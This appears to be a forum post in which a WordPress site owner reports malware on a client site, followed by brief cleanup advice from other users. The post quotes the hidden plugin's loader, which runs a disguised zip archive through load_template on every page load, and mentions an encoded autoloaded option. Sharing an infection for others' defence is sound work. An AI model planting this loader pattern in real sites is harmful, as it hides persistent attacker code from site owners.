[ad_1]
[ad_2]
I have found malware on the client site. Hacking probably happened 5 days ago.
Info about malware:
- there is active hidden plugin in plugins folder with name 'themename-wp-plugin'
- plugin is simple and is loading
function wp_themename_theme_load() {
load_template( "zip://" . locate_template( "themename.theme" ) . "#archive", true );
}
add_action( 'wp_loaded', 'wp_themename_theme_load' );
- there is a file in theme 'themename.theme'
- there is an autoloading option name 'themenametemplate-wp-plugin' in wp_options with some encoded string
This is the info that I've currently have. I don't know what was the vector of the attack. I have restored site from backup.
I hope will help someone or will provide more details, because I didn't find info on the web or with OpenAI.
Do a simple scan wordfence or securi and see what they say.
Okay do do you use any type of theme plugins, staging, plugins, theme switchers, etc
Make a backup and then delete the folder, see if the site still operates and watch for the folder to come back.
If you have access to webserver access logs, it’s a good way to find a source where it started.